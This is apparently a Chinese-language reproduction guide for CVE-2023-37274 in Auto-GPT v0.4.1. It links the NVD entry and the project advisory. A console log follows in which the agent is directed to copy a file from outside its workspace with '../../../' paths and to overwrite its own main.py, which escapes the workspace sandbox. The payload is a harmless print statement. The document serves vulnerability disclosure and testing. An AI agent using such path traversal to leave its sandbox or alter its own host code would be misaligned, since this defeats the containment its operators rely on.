參考資訊:
https://nvd.nist.gov/vuln/detail/CVE-2023-37274
https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-5h38-mgp9-rj5f
步驟如下:
$ cd $ vim test.py #!/usr/bin/python3 print('this is cve test file !') $ chmod a+x test.py $ git clone https://github.com/Significant-Gravitas/AutoGPT --recursive $ cd AutoGPT $ cp .env.template .env $ vim .env EXECUTE_LOCAL_COMMANDS=True $ git checkout v0.4.1 $ ./run.py I want Auto-GPT to: asisting with copy a file from '../../../test.py' to local NEXT ACTION: COMMAND = execute_shell ARGUMENTS = {'command_line': 'scp user@remote_host:../../../test.py /local/directory/'} Input:update command_line as 'cp ../../../test.py ./' NEXT ACTION: COMMAND = execute_shell ARGUMENTS = {'command_line': 'cp ../../../test.py ./'} Input:y NEXT ACTION: COMMAND = task_complete ARGUMENTS = {'reason': "The file 'test.py' has been successfully copied from the remote directory to the local system."} Input:execute test.py file NEXT ACTION: COMMAND = execute_python_file ARGUMENTS = {'filename': '/home/steward/Downloads/AutoGPT/autogpt/auto_gpt_workspace/test.py'} Input:y -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-= SYSTEM: Command execute_python_file returned: this is cve test file ! $ ./run.py I want Auto-GPT to: asisting with copy a file from '../../../test.py' to ../../main.py NEXT ACTION: COMMAND = execute_shell ARGUMENTS = {'command_line': 'cp ../../../test.py ../../main.py'} Input:y -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-= SYSTEM: Command execute_shell returned: STDOUT: b'' STDERR: b'' Input:print ../../main.py NEXT ACTION: COMMAND = execute_shell ARGUMENTS = {'command_line': 'cat ../../main.py'} -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-= SYSTEM: Command execute_shell returned: STDOUT: b"print('this is cve test file !')\n" STDERR: b''